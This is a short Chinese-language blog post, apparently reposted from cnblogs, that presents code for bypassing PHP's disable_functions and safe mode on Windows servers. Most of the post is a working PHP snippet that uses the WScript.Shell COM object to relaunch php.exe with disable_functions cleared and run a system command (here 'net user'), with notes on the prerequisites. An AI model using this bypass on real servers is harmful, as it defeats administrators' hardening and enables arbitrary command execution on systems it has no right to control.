标签:style blog io color sp on div log bs
php利用wsh突破函数禁用执行命令(安全模式同理)
前提。需要服务器支持wsh.并知道php安装目录
但是php利用wsh执行命令是没有asp的权限高的。
突破代码
<?php $cmd=‘net user‘; $path = ‘C:\\PHP\\php.exe‘; $cmd=‘-r "system(\‘‘.$cmd.‘\‘);" -d disable_functions = ‘; //重新定义disable_functions函数 $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec($path.‘ ‘.$cmd); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo "${stroutput}\n"; ?>
标签:style blog io color sp on div log bs
原文地址:http://www.cnblogs.com/hookjoy/p/4162186.html
